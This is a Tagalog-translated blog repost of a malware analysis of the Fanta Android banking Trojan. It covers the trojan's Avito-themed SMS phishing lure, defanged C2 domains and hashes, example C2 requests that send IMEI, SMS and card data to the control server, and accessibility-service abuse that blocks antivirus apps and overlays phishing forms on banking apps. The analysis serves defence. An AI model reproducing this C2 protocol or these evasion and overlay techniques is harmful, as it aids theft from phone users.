ProHoster > Blog > balita sa internet > Leisya, Fanta: mga bagong taktika ng lumang Android Trojan

Leisya, Fanta: mga bagong taktika ng lumang Android Trojan

Leisya, Fanta: mga bagong taktika ng lumang Android Trojan

Isang araw na gusto mong magbenta ng isang bagay sa Avito at, sa pag-post ng isang detalyadong paglalarawan ng iyong produkto (halimbawa, isang module ng RAM), matatanggap mo ang mensaheng ito:

Leisya, Fanta: mga bagong taktika ng lumang Android TrojanSa sandaling binuksan mo ang link, makikita mo ang isang tila hindi nakapipinsalang pahina na nag-aabiso sa iyo, ang masaya at matagumpay na nagbebenta, na may ginawang pagbili:

Leisya, Fanta: mga bagong taktika ng lumang Android Trojan
Kapag na-click mo ang button na “Magpatuloy,” mada-download sa iyong Android device ang isang APK file na may icon at isang pangalan na nagbibigay inspirasyon sa tiwala. Nag-install ka ng application na sa ilang kadahilanan ay humiling ng mga karapatan sa AccessibilityService, pagkatapos ay lumitaw ang ilang mga window at mabilis na nawala at... Iyon lang.

Pumunta ka para tingnan ang iyong balanse, ngunit sa ilang kadahilanan ay hinihiling muli ng iyong banking app ang mga detalye ng iyong card. Matapos ipasok ang data, may nangyaring kakila-kilabot: sa ilang kadahilanan na hindi pa rin malinaw sa iyo, nagsisimulang mawala ang pera sa iyong account. Sinusubukan mong lutasin ang problema, ngunit lumalaban ang iyong telepono: pinindot nito ang mga key na "Bumalik" at "Home", hindi naka-off at hindi pinapayagan kang i-activate ang anumang mga hakbang sa seguridad. Bilang isang resulta, ikaw ay naiwang walang pera, ang iyong mga kalakal ay hindi nabili, ikaw ay nalilito at nagtataka: ano ang nangyari?

Ang sagot ay simple: naging biktima ka ng Android Trojan Fanta, isang miyembro ng pamilyang Flexnet. Paano ito nangyari? Ipaliwanag natin ngayon.

Mga May-akda: Andrey Polovinkin, junior specialist sa pagsusuri ng malware, Ivan Pisarev, espesyalista sa pagsusuri ng malware.

Ang ilang mga istatistika

Ang pamilya ng Flexnet ng mga Android Trojan ay unang nakilala noong 2015. Sa isang medyo mahabang panahon ng aktibidad, ang pamilya ay lumawak sa ilang mga subspecies: Fanta, Limebot, Lipton, atbp. Ang Trojan, pati na rin ang imprastraktura na nauugnay dito, ay hindi tumitigil: ang mga bagong epektibong scheme ng pamamahagi ay binuo - sa aming kaso, ang mga de-kalidad na pahina ng phishing na naglalayong sa isang tiyak na nagbebenta ng gumagamit, at ang mga developer ng Trojan ay sumusunod sa mga uso sa uso sa pagsulat ng virus - pagdaragdag ng bagong functionality na ginagawang posible na magnakaw ng mas mahusay na pera mula sa mga nahawaang device at mga mekanismo ng proteksyon ng bypass.

Ang kampanyang inilarawan sa artikulong ito ay naglalayong sa mga user mula sa Russia; ang isang maliit na bilang ng mga nahawaang device ay naitala sa Ukraine, at mas kaunti pa sa Kazakhstan at Belarus.

Kahit na ang Flexnet ay nasa Android Trojan arena nang mahigit 4 na taon na ngayon at pinag-aralan nang detalyado ng maraming mananaliksik, ito ay nasa mabuting kalagayan pa rin. Simula sa Enero 2019, ang potensyal na halaga ng pinsala ay higit sa 35 milyong rubles - at ito ay para lamang sa mga kampanya sa Russia. Noong 2015, ang iba't ibang bersyon ng Android Trojan na ito ay naibenta sa mga underground na forum, kung saan matatagpuan din ang source code ng Trojan na may detalyadong paglalarawan. Nangangahulugan ito na ang mga istatistika ng pinsala sa mundo ay mas kahanga-hanga. Hindi isang masamang tagapagpahiwatig para sa isang matandang lalaki, hindi ba?

Leisya, Fanta: mga bagong taktika ng lumang Android Trojan

Mula sa pagbebenta hanggang sa panlilinlang

Tulad ng makikita mula sa naunang ipinakita na screenshot ng isang pahina ng phishing para sa serbisyo sa Internet para sa pag-post ng mga ad na Avito, inihanda ito para sa isang partikular na biktima. Malamang, ginagamit ng mga umaatake ang isa sa mga parser ng Avito, na kumukuha ng numero ng telepono at pangalan ng nagbebenta, pati na rin ang paglalarawan ng produkto. Pagkatapos palawakin ang page at ihanda ang APK file, padadalhan ang biktima ng SMS kasama ang kanyang pangalan at link sa isang pahina ng phishing na naglalaman ng paglalarawan ng kanyang produkto at ang halagang natanggap mula sa "pagbebenta" ng produkto. Sa pamamagitan ng pag-click sa button, natatanggap ng user ang isang malisyosong APK file - Fanta.

Ang isang pag-aaral ng shcet491[.]ru domain ay nagpakita na ito ay itinalaga sa mga DNS server ng Hostinger:

  • ns1.hostinger.ru
  • ns2.hostinger.ru
  • ns3.hostinger.ru
  • ns4.hostinger.ru

Ang domain zone file ay naglalaman ng mga entry na tumuturo sa mga IP address na 31.220.23[.]236, 31.220.23[.]243, at 31.220.23[.]235. Gayunpaman, ang pangunahing resource record ng domain (A record) ay tumuturo sa isang server na may IP address na 178.132.1[.]240.

Ang IP address na 178.132.1[.]240 ay matatagpuan sa Netherlands at kabilang sa hoster WorldStream. Ang mga IP address na 31.220.23[.]235, 31.220.23[.]236 at 31.220.23[.]243 ay matatagpuan sa UK at kabilang sa shared hosting server HOSTINGER. Ginamit bilang isang recorder openprov-ru. Nalutas din ang mga sumusunod na domain sa IP address na 178.132.1[.]240:

  • sdelka-ru[.]ru
  • tovar-av[.]ru
  • av-tovar[.]ru
  • ru-sdelka[.]ru
  • shcet382[.]ru
  • sdelka221[.]ru
  • sdelka211[.]ru
  • vyplata437[.]ru
  • viplata291[.]ru
  • perevod273[.]ru
  • perevod901[.]ru

Dapat tandaan na ang mga link sa sumusunod na format ay magagamit mula sa halos lahat ng mga domain:

http://(www.){0,1}<%domain%>/[0-9]{7}

Kasama rin sa template na ito ang isang link mula sa isang mensaheng SMS. Batay sa makasaysayang data, natagpuan na ang isang domain ay tumutugma sa ilang mga link sa pattern na inilarawan sa itaas, na nagpapahiwatig na ang isang domain ay ginamit upang ipamahagi ang Trojan sa ilang mga biktima.

Umusad tayo nang kaunti: ang Trojan na na-download sa pamamagitan ng isang link mula sa isang SMS ay gumagamit ng address bilang isang control server onusedseddohap[.]club. Nakarehistro ang domain na ito noong 2019-03-12, at simula noong 2019-04-29, nakipag-ugnayan ang mga APK application sa domain na ito. Batay sa data na nakuha mula sa VirusTotal, kabuuang 109 na application ang nakipag-ugnayan sa server na ito. Ang domain mismo ay nalutas sa IP address 217.23.14[.]27, na matatagpuan sa Netherlands at pag-aari ng hoster WorldStream. Ginamit bilang isang recorder namecheap. Nalutas din ang mga domain sa IP address na ito bad-racoon[.]club (simula sa 2018-09-25) at bad-racoon[.]live (simula sa 2018-10-25). Gamit ang domain bad-racoon[.]club higit sa 80 APK file ang nakipag-ugnayan sa bad-racoon[.]live - higit sa 100.

Sa pangkalahatan, ang pag-atake ay umuusad tulad ng sumusunod:

Leisya, Fanta: mga bagong taktika ng lumang Android Trojan

Ano ang nasa ilalim ng takip ni Fanta?

Tulad ng maraming iba pang mga Android Trojan, ang Fanta ay may kakayahang magbasa at magpadala ng mga mensaheng SMS, gumawa ng mga kahilingan sa USSD, at magpakita ng sarili nitong mga bintana sa ibabaw ng mga application (kabilang ang mga banking). Gayunpaman, dumating na ang arsenal ng pag-andar ng pamilyang ito: nagsimulang gamitin ang Fanta AccessibilityService para sa iba't ibang layunin: pagbabasa ng mga nilalaman ng mga abiso mula sa iba pang mga application, pagpigil sa pag-detect at pagpapahinto sa pagpapatupad ng isang Trojan sa isang nahawaang device, atbp. Gumagana ang Fanta sa lahat ng bersyon ng Android na hindi mas bata sa 4.4. Sa artikulong ito, susuriin natin ang sumusunod na sample ng Fanta:

  • MD5: 0826bd11b2c130c4c8ac137e395ac2d4
  • SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
  • SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

Kaagad pagkatapos ng paglulunsad

Kaagad pagkatapos ng paglunsad, itinatago ng Trojan ang icon nito. Ang application ay maaari lamang gumana kung ang pangalan ng nahawaang device ay wala sa listahan:

  • android_x86
  • VirtualBox
  • Nexus 5X(bullhead)
  • Nexus 5(razor)

Ang pagsusuri na ito ay isinasagawa sa pangunahing serbisyo ng Trojan - Pangunahing Serbisyo. Kapag inilunsad sa unang pagkakataon, ang mga parameter ng pagsasaayos ng application ay sinisimulan sa mga default na halaga (ang format para sa pag-iimbak ng data ng pagsasaayos at ang kahulugan ng mga ito ay tatalakayin sa ibang pagkakataon), at ang isang bagong nahawaang aparato ay nakarehistro sa control server. Isang HTTP POST na kahilingan na may uri ng mensahe ay ipapadala sa server register_bot at impormasyon tungkol sa nahawaang device (bersyon ng Android, IMEI, numero ng telepono, pangalan ng operator at code ng bansa kung saan nakarehistro ang operator). Ang address ay nagsisilbing control server hXXp://onuseseddohap[.]club/controller.php. Bilang tugon, nagpapadala ang server ng mensahe na naglalaman ng mga field bot_id, bot_pwd, server — nai-save ng application ang mga halagang ito bilang mga parameter ng server ng CnC. Parameter server opsyonal kung hindi natanggap ang field: Ginagamit ng Fanta ang address ng pagpaparehistro - hXXp://onuseseddohap[.]club/controller.php. Ang pagpapaandar ng pagpapalit ng CnC address ay maaaring gamitin upang malutas ang dalawang problema: upang ipamahagi ang load nang pantay-pantay sa pagitan ng ilang mga server (kung mayroong isang malaking bilang ng mga nahawaang device, ang pag-load sa isang hindi na-optimize na web server ay maaaring mataas), at para magamit. isang alternatibong server kung sakaling mabigo ang isa sa mga server ng CnC.

Kung may naganap na error habang ipinapadala ang kahilingan, uulitin ng Trojan ang proseso ng pagpaparehistro pagkatapos ng 20 segundo.

Sa sandaling matagumpay na nairehistro ang device, ipapakita ng Fanta ang sumusunod na mensahe sa user:

Leisya, Fanta: mga bagong taktika ng lumang Android Trojan
Mahalagang tala: tinawag ang serbisyo Sistema ng seguridad — ang pangalan ng serbisyo ng Trojan, at pagkatapos ng pag-click sa pindutan OK Magbubukas ang isang window na may mga setting ng Accessibility ng nahawaang device, kung saan dapat magbigay ang user ng mga karapatan sa Accessibility para sa malisyosong serbisyo:

Leisya, Fanta: mga bagong taktika ng lumang Android Trojan
Sa sandaling mag-on ang user AccessibilityService, ang Fanta ay nakakakuha ng access sa mga nilalaman ng mga window ng application at ang mga aksyon na ginawa sa mga ito:

Leisya, Fanta: mga bagong taktika ng lumang Android Trojan
Kaagad pagkatapos matanggap ang mga karapatan sa Accessibility, ang Trojan ay humihiling ng mga karapatan ng administrator at karapatang magbasa ng mga notification:

Leisya, Fanta: mga bagong taktika ng lumang Android Trojan
Gamit ang AccessibilityService, ginagaya ng application ang mga keystroke, sa gayo'y binibigyan ang sarili ng lahat ng kinakailangang karapatan.

Gumagawa ang Fanta ng maraming instance sa database (na ilalarawan sa ibang pagkakataon) na kinakailangan upang mag-imbak ng data ng configuration, pati na rin ang impormasyong nakolekta sa proseso tungkol sa nahawaang device. Upang ipadala ang nakolektang impormasyon, ang Trojan ay lumilikha ng paulit-ulit na gawain na idinisenyo upang mag-download ng mga patlang mula sa database at makatanggap ng utos mula sa control server. Ang pagitan para sa pag-access sa CnC ay nakatakda depende sa bersyon ng Android: sa kaso ng 5.1, ang pagitan ay magiging 10 segundo, kung hindi man ay 60 segundo.

Upang matanggap ang utos, gumawa ng kahilingan si Fanta GetTask sa server ng pamamahala. Bilang tugon, maaaring ipadala ng CnC ang isa sa mga sumusunod na command:

Koponan Описание
0 Magpadala ng SMS message
1 Tumawag sa telepono o USSD command
2 Ina-update ang isang parameter agwat
3 Ina-update ang isang parameter maharang
6 Ina-update ang isang parameter smsManager
9 Simulan ang pagkolekta ng mga mensaheng SMS
11 I-reset ang iyong telepono sa mga factory setting
12 Paganahin/Huwag paganahin ang pag-log ng paggawa ng dialog box

Nangongolekta din ang Fanta ng mga abiso mula sa 70 banking apps, mabilis na mga sistema ng pagbabayad at mga e-wallet at iniimbak ang mga ito sa isang database.

Pag-iimbak ng mga parameter ng pagsasaayos

Para mag-imbak ng mga parameter ng configuration, gumagamit ang Fanta ng karaniwang diskarte para sa Android platform - Mga Kagustuhan-mga file. Ang mga setting ay ise-save sa isang file na pinangalanan mga setting. Ang isang paglalarawan ng mga naka-save na parameter ay nasa talahanayan sa ibaba.

pangalan Default na halaga Mga posibleng halaga Описание
id 0 Integer Bot ID
server hXXp://onuseseddohap[.]club/ URL Kontrolin ang address ng server
pwd - Pisi Password ng serber
agwat 20 Integer agwat ng oras. Isinasaad kung gaano katagal dapat ipagpaliban ang mga sumusunod na gawain:

  • Kapag nagpapadala ng kahilingan tungkol sa katayuan ng ipinadalang mensaheng SMS
  • Pagtanggap ng bagong command mula sa management server
maharang lahat lahat/telNumber Kung ang patlang ay katumbas ng string lahat o telNumber, pagkatapos ang natanggap na mensaheng SMS ay haharangin ng application at hindi ipapakita sa user
smsManager 0 0/1 I-enable/disable ang application bilang default na tatanggap ng SMS
readDialog hindi totoo Tama/mali Paganahin/Huwag paganahin ang pag-log ng kaganapan AccessibilityEvent

Ginagamit din ng Fanta ang file smsManager:

pangalan Default na halaga Mga posibleng halaga Описание
pckg - Pisi Pangalan ng SMS message manager na ginamit

Pakikipag-ugnayan sa mga database

Sa panahon ng operasyon nito, ang Trojan ay gumagamit ng dalawang database. Pinangalanan ang database a ginagamit upang mag-imbak ng iba't ibang impormasyong nakolekta mula sa telepono. Ang pangalawang database ay pinangalanan fanta.db at ginagamit upang i-save ang mga setting na responsable para sa paglikha ng mga phishing window na idinisenyo upang mangolekta ng impormasyon tungkol sa mga bank card.

Trojan ay gumagamit ng database а upang mag-imbak ng nakolektang impormasyon at mag-log sa iyong mga aksyon. Ang data ay nakaimbak sa isang talahanayan mga tala. Upang lumikha ng isang talahanayan, gamitin ang sumusunod na SQL query:

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

Ang database ay naglalaman ng sumusunod na impormasyon:

1. Pag-log sa startup ng nahawaang device gamit ang isang mensahe Naka-on ang telepono!

2. Mga abiso mula sa mga aplikasyon. Ang mensahe ay nabuo ayon sa sumusunod na template:

(<%App Name%>)<%Title%>: <%Notification text%>

3. Data ng bank card mula sa mga phishing form na ginawa ng Trojan. Parameter VIEW_NAME maaaring isa sa mga sumusunod:

  • AliExpress
  • Avito
  • Google Play
  • Miscellaneous

Ang mensahe ay naka-log sa format:

[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>

4. Mga papasok/papalabas na SMS na mensahe sa format:

([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>

5. Impormasyon tungkol sa package na lumilikha ng dialog box sa format:

(<%Package name%>)<%Package information%>

Halimbawang talahanayan mga tala:

Leisya, Fanta: mga bagong taktika ng lumang Android Trojan
Ang isa sa mga pag-andar ng Fanta ay ang koleksyon ng impormasyon tungkol sa mga bank card. Nangyayari ang pangongolekta ng data sa pamamagitan ng paglikha ng mga phishing window kapag nagbubukas ng mga application sa pagbabangko. Isang beses lang nililikha ng Trojan ang window ng phishing. Ang impormasyon na ipinakita ang window sa user ay naka-imbak sa isang talahanayan mga setting sa database fanta.db. Upang lumikha ng isang database, gamitin ang sumusunod na SQL query:

create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

Lahat ng mga patlang ng talahanayan mga setting sa pamamagitan ng default na nasimulan sa 1 (lumikha ng phishing window). Pagkatapos ipasok ng user ang kanilang data, itatakda ang value sa 0. Halimbawa ng mga field ng talahanayan mga setting:

  • can_login — ang field ay may pananagutan sa pagpapakita ng form kapag nagbubukas ng aplikasyon sa pagbabangko
  • first_bank - hindi ginagamit
  • can_avito — ang field ay responsable para sa pagpapakita ng form kapag binubuksan ang Avito application
  • can_ali — ang field ay may pananagutan sa pagpapakita ng form kapag binubuksan ang Aliexpress application
  • maaari_isa pa — ang field ay responsable para sa pagpapakita ng form kapag binubuksan ang anumang aplikasyon mula sa listahan: Yula, Pandao, Drom Auto, Wallet. Discount at bonus card, Aviasales, Booking, Trivago
  • can_card — ang field ay may pananagutan sa pagpapakita ng form kapag binubuksan Google Play

Pakikipag-ugnayan sa server ng pamamahala

Ang pakikipag-ugnayan sa network sa server ng pamamahala ay nangyayari sa pamamagitan ng HTTP protocol. Upang magtrabaho kasama ang network, ginagamit ng Fanta ang sikat na library ng Retrofit. Ang mga kahilingan ay ipinadala sa: hXXp://onuseseddohap[.]club/controller.php. Maaaring baguhin ang address ng server kapag nagrerehistro sa server. Maaaring ipadala ang cookies bilang tugon mula sa server. Ginagawa ng Fanta ang mga sumusunod na kahilingan sa server:

  • Ang pagpaparehistro ng bot sa control server ay nangyayari nang isang beses, sa unang paglunsad. Ang sumusunod na data tungkol sa nahawaang device ay ipinadala sa server:
    · Cookie — cookies na natanggap mula sa server (ang default na halaga ay isang walang laman na string)
    · paraan — string constant register_bot
    · unlapi — integer constant 2
    · version_sdk — ay nabuo ayon sa sumusunod na template: /(Avit)
    · IMEI — IMEI ng nahawaang device
    · bansa — code ng bansa kung saan nakarehistro ang operator, sa format na ISO
    · numero - numero ng telepono
    · opereytor — pangalan ng operator

    Isang halimbawa ng kahilingang ipinadala sa server:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>

    Bilang tugon sa kahilingan, dapat magbalik ang server ng JSON object na naglalaman ng mga sumusunod na parameter:
    · bot_id — ID ng nahawaang device. Kung ang bot_id ay katumbas ng 0, muling isasagawa ng Fanta ang kahilingan.
    bot_pwd — password para sa server.
    server — kontrolin ang address ng server. Opsyonal na parameter. Kung hindi tinukoy ang parameter, gagamitin ang address na naka-save sa application.

    Halimbawa JSON object:

    {
    "response":[
   	 {
   		 "bot_id": <%BOT_ID%>,
   		 "bot_pwd": <%BOT_PWD%>,
   		 "server": <%SERVER%>
   	 }
    ],
    "status":"ok"
}

  • Humiling na makatanggap ng utos mula sa server. Ang sumusunod na data ay ipinadala sa server:
    · Cookie — cookies na natanggap mula sa server
    · tawad — id ng nahawaang aparato na natanggap noong ipinadala ang kahilingan register_bot
    · pwd — password para sa server
    · divice_admin — tinutukoy ng field kung nakuha ang mga karapatan ng administrator. Kung ang mga karapatan ng administrator ay nakuha, ang field ay katumbas ng 1, kung hindi 0
    · Aksesibilidad — Katayuan ng pagpapatakbo ng Serbisyo ng Accessibility. Kung sinimulan ang serbisyo, ang halaga ay 1, kung hindi 0
    · SMSManager — ipinapakita kung ang Trojan ay pinagana bilang default na application para sa pagtanggap ng SMS
    · tabing — ipinapakita kung anong estado ang nasa screen. Ang halaga ay itatakda 1, kung naka-on ang screen, kung hindi 0;

    Isang halimbawa ng kahilingang ipinadala sa server:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>

    Depende sa command, maaaring ibalik ng server ang isang JSON object na may iba't ibang mga parameter:

    · Koponan Magpadala ng SMS message: Ang mga parameter ay naglalaman ng numero ng telepono, ang teksto ng mensaheng SMS at ang ID ng mensaheng ipinapadala. Ginagamit ang identifier kapag nagpapadala ng mensahe sa server na may uri setSmsStatus. 

    {
    "response":
    [
   	 {
   		 "mode": 0,
   		 "sms_number": <%SMS_NUMBER%>,
   		 "sms_text": <%SMS_TEXT%>,
   		 "sms_id": %SMS_ID%
   	 }
    ],
    "status":"ok"
}

    · Koponan Tumawag sa telepono o USSD command: Ang numero ng telepono o command ay nasa katawan ng pagtugon. 

    {
    "response":
    [
   	 {
   		 "mode": 1,
   		 "command": <%TEL_NUMBER%>
   	 }
    ],
    "status":"ok"
}

    · Koponan Baguhin ang parameter ng pagitan. 

    {
    "response":
    [
   	 {
   		 "mode": 2,
   		 "interval": <%SECONDS%>
   	 }
    ],
    "status":"ok"
}

    · Koponan Baguhin ang parameter ng intercept. 

    {
    "response":
    [
   	 {
   		 "mode": 3,
   		 "intercept": "all"/"telNumber"/<%ANY_STRING%>
   	 }
    ],
    "status":"ok"
}

    · Koponan Baguhin ang field ng SmsManager. 

    {
    "response":
    [
   	 {
   		 "mode": 6,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}

    · Koponan Mangolekta ng mga mensaheng SMS mula sa isang nahawaang device.

    {
    "response":
    [
   	 {
   		 "mode": 9
   	 }
    ],
    "status":"ok"
}

    · Koponan I-reset ang iyong telepono sa mga factory setting: 

    {
    "response":
    [
   	 {
   		 "mode": 11
   	 }
    ],
    "status":"ok"
}

    · Koponan Baguhin ang parameter ng ReadDialog. 

    {
    "response":
    [
   	 {
   		 "mode": 12,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}

  • Nagpapadala ng mensahe na may uri setSmsStatus. Ang kahilingang ito ay ginawa pagkatapos maisagawa ang utos Magpadala ng SMS message. Mukhang ganito ang kahilingan:

POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>

  • Pag-upload ng mga nilalaman ng database. Isang row ang ipinapadala sa bawat kahilingan. Ang sumusunod na data ay ipinadala sa server:
    · Cookie — cookies na natanggap mula sa server
    · paraan — string constant setSaveInboxSms
    · tawad — id ng nahawaang aparato na natanggap noong ipinadala ang kahilingan register_bot
    · teksto — teksto sa kasalukuyang record ng database (field d mula sa mesa mga tala sa database а)
    · numero — pangalan ng kasalukuyang record ng database (field p mula sa mesa mga tala sa database а)
    · sms_mode — halaga ng integer (field m mula sa mesa mga tala sa database а)

    Mukhang ganito ang kahilingan:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>

    Kung matagumpay na naipadala sa server, ang hilera ay tatanggalin mula sa talahanayan. Halimbawa ng JSON object na ibinalik ng server:

    {
    "response":[],
    "status":"ok"
}

Nakikipag-ugnayan sa AccessibilityService

Ipinatupad ang AccessibilityService upang gawing mas madaling gamitin ang mga Android device para sa mga taong may mga kapansanan. Sa karamihan ng mga kaso, kinakailangan ang pisikal na pakikipag-ugnayan upang makipag-ugnayan sa isang application. Binibigyang-daan ka ng AccessibilityService na gawin ang mga ito sa programmatically. Ginagamit ng Fanta ang serbisyo upang lumikha ng mga pekeng window sa mga application sa pagbabangko at pigilan ang mga user na buksan ang mga setting ng system at ilang application.

Gamit ang functionality ng AccessibilityService, sinusubaybayan ng Trojan ang mga pagbabago sa mga elemento sa screen ng nahawaang device. Tulad ng naunang inilarawan, ang mga setting ng Fanta ay naglalaman ng isang parameter na responsable para sa mga operasyon sa pag-log na may mga dialog box - readDialog. Kung nakatakda ang parameter na ito, ang impormasyon tungkol sa pangalan at paglalarawan ng package na nag-trigger sa kaganapan ay idaragdag sa database. Ginagawa ng Trojan ang mga sumusunod na pagkilos kapag na-trigger ang mga kaganapan:

  • Ginagaya ang pagpindot sa back at home key sa mga sumusunod na kaso:
    · kung gusto ng user na i-reboot ang kanyang device
    · kung gusto ng user na tanggalin ang application na “Avito” o baguhin ang mga karapatan sa pag-access
    · kung may nabanggit na "Avito" na aplikasyon sa pahina
    · kapag binubuksan ang Google Play Protect application
    · kapag binubuksan ang mga page na may mga setting ng AccessibilityService
    · kapag lumitaw ang dialog box ng System Security
    · kapag binubuksan ang page gamit ang mga setting ng “Draw over other app.”
    · kapag binubuksan ang pahina ng "Mga Application", "Pagbawi at pag-reset", "Pag-reset ng data", "Pag-reset ng mga setting", "Panel ng developer", "Espesyal. mga pagkakataon", "Mga espesyal na pagkakataon", "Mga espesyal na karapatan"
    · kung ang kaganapan ay nabuo ng ilang partikular na application.

    Listahan ng aplikasyon

    • Android
    • Master Lite
    • Malinis Master
    • Clean Master para sa x86 CPU
    • Pamamahala ng Pahintulot sa Application ng Meizu
    • Seguridad ng MIUI
    • Clean Master - Antivirus at Cache at Panlinis ng Basura
    • Mga kontrol ng magulang at GPS: Kaspersky SafeKids
    • Kaspersky Antivirus AppLock at Web Security Beta
    • Panlinis ng Virus, Antivirus, Panlinis (MAX Security)
    • Mobile AntiVirus Security PRO
    • Avast antivirus at libreng proteksyon 2019
    • Mobile Security MegaFon
    • Proteksyon ng AVG para sa Xperia
    • Mobile Security
    • Malwarebytes Antivirus at Proteksyon
    • Antivirus para sa Android 2019
    • Security Master - Antivirus, VPN, AppLock, Booster
    • AVG antivirus para sa Huawei tablet System Manager
    • Samsung Accessibility
    • Samsung Smart Manager
    • Security Master
    • Pampabilis
    • dr.web
    • Dr. Web Security Space
    • Dr.Web Mobile Control Center
    • Dr.Web Security Space Life
    • Dr.Web Mobile Control Center
    • Antivirus at Seguridad sa Mobile
    • Kaspersky Internet Security: Antivirus at Proteksyon
    • Kaspersky Battery Life: Saver & Booster
    • Kaspersky Endpoint Security - proteksyon at pamamahala
    • AVG Antivirus free 2019 – Proteksyon para sa Android
    • Antivirus Android
    • Norton Mobile Security at Antivirus
    • Antivirus, firewall, VPN, seguridad sa mobile
    • Mobile Security: antivirus, VPN, proteksyon sa pagnanakaw
    • Antivirus para sa Android

  • Kung humiling ng pahintulot kapag nagpapadala ng SMS message sa isang maikling numero, ginagaya ng Fanta ang pag-click sa checkbox Tandaan ang pagpili at pindutan magpadala.
  • Kapag sinubukan mong alisin ang mga karapatan ng administrator mula sa Trojan, ni-lock nito ang screen ng telepono.
  • Pinipigilan ang pagdaragdag ng mga bagong administrator.
  • Kung ang antivirus application dr.web nakakita ng banta, ginagaya ni Fanta ang pagpindot sa button Huwag pansinin.
  • Ginagaya ng Trojan ang pagpindot sa back at home button kung ang kaganapan ay nabuo ng application Pangangalaga ng Samsung Device.
  • Gumagawa ang Fanta ng mga phishing window na may mga form para sa pagpasok ng impormasyon tungkol sa mga bank card kung inilunsad ang isang application mula sa isang listahan ng humigit-kumulang 30 iba't ibang serbisyo sa Internet. Kabilang sa mga ito: AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drom Auto, atbp.

    Mga Phishing Form

    Sinusuri ng Fanta kung aling mga application ang tumatakbo sa nahawaang device. Kung ang isang aplikasyon ng interes ay binuksan, ang Trojan ay nagpapakita ng isang phishing window sa itaas ng lahat ng iba pa, na isang form para sa pagpasok ng impormasyon sa bank card. Dapat ipasok ng user ang sumusunod na data:

    • Numero ng card
    • Petsa ng pag-expire ng card
    • CVV
    • Pangalan ng cardholder (hindi para sa lahat ng bangko)

    Depende sa tumatakbong application, iba't ibang phishing window ang ipapakita. Nasa ibaba ang mga halimbawa ng ilan sa kanila:

    AliExpress:

    Leisya, Fanta: mga bagong taktika ng lumang Android Trojan
    Avito:

    Leisya, Fanta: mga bagong taktika ng lumang Android Trojan
    Para sa ilang iba pang application, hal. Google Play Market, Aviasales, Pandao, Booking, Trivago:
    Leisya, Fanta: mga bagong taktika ng lumang Android Trojan

    Kung paano talaga

    Sa kabutihang palad, ang taong nakatanggap ng mensaheng SMS na inilarawan sa simula ng artikulo ay naging isang espesyalista sa cybersecurity. Samakatuwid, ang tunay, hindi-direktor na bersyon ay naiiba sa isa na sinabi kanina: ang isang tao ay nakatanggap ng isang kawili-wiling SMS, pagkatapos ay ibinigay niya ito sa pangkat ng Group-IB Threat Hunting Intelligence. Ang resulta ng pag-atake ay ang artikulong ito. Happy ending diba? Gayunpaman, hindi lahat ng mga kuwento ay matagumpay na nagtatapos, at upang ang sa iyo ay hindi magmukhang isang hiwa ng direktor na may pagkawala ng pera, sa karamihan ng mga kaso ito ay sapat na upang sumunod sa mga sumusunod na matagal nang inilarawan na mga patakaran:

    • huwag mag-install ng mga application para sa isang mobile device na may Android OS mula sa anumang pinagmulan maliban sa Google Play
    • Kapag nag-i-install ng isang application, bigyang-pansin ang mga karapatan na hinihiling ng application
    • bigyang pansin ang mga extension ng mga na-download na file
    • regular na i-install ang mga update sa Android OS
    • huwag bisitahin ang mga kahina-hinalang mapagkukunan at huwag mag-download ng mga file mula doon
    • Huwag mag-click sa mga link na natanggap sa mga mensaheng SMS.

Pinagmulan: www.habr.com

Magdagdag ng komento